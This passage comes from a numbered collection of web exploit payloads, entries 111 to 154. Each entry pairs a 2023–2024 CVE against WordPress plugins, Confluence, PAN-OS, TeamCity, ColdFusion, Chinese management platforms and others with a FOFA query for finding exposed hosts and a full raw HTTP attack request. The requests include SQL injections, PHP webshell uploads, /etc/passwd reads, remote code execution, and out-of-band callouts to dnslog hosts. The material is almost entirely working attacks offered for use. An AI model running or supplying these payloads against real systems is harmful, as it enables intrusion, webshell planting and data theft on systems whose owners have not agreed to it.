User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
